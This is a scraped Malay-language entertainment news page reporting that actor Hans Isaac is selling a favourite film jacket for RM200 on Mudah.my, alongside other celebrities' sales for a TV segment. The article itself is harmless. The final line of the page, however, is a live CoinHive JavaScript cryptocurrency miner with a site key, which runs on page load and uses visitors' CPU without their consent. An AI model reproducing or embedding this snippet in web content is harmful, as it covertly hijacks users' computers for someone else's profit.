© Copyright 2017, All Rights Reserved
Home / Hiburan / Hans Isaac jual jaket kesayangan semurah RM200

Hans Isaac jual jaket kesayangan semurah RM200

PELAKON Datuk Hans Isaac menjual sehelai jaket kesayangan yang pernah dipakainya beberapa kali untuk beberapa babak dalam filem dan drama lakonannya.

Hans juga pernah menjadi duta untuk jenama pakaian tersebut.

“Jaket ini saya gunakan ketika penggambaran filem Misteri Jalan Lama dan ia merupakan jaket kegemaran saya. 

“Malah, di jaket itu juga masih ada label konti dan babak yang tidak saya tanggalkan.

“Menariknya juga saya pernah dilantik menjadi duta selama setahun untuk jenama jaket ini,” katanya.

Jaket jenama Yishion itu dijual oleh Hans di platform Mudah.my dengan harga RM200.

Selain jaket, Hans turut menjualkan set kutleri berukiran tulisan Korea berharga RM300.

Bagi yang terlepas menyaksikan episod keempat My Mudah Stories minggu lalu, pelakon cantik Liyana Jasmay telah menjualkan dres kesayangannya semurah RM30 selain set permainan anak-anaknya bernilai RM50.

Manakala, penyanyi Jaclyn Victor pula menjualkan empat helai gaun yang pernah dipakainya untuk acara konsert dan muzik video bermula harga RM100 hingga RM500.
 
Untuk mengetahui barangan menarik lain yang dijual artis kesayangan anda di platform Mudah.my, saksikan My Mudah Stories setiap hari Ahad pukul 11.30 malam di saluran Astro Ria dan Ria HD. Mudah.my, Malaysia’s Largest Marketplace. 


Teks oleh: Amri Hassan


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Idayu juara AF Megastar 2017

SHAH ALAM: Idayu dinobatkan sebagai Juara AF Megastar sekali gus meraih wang ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();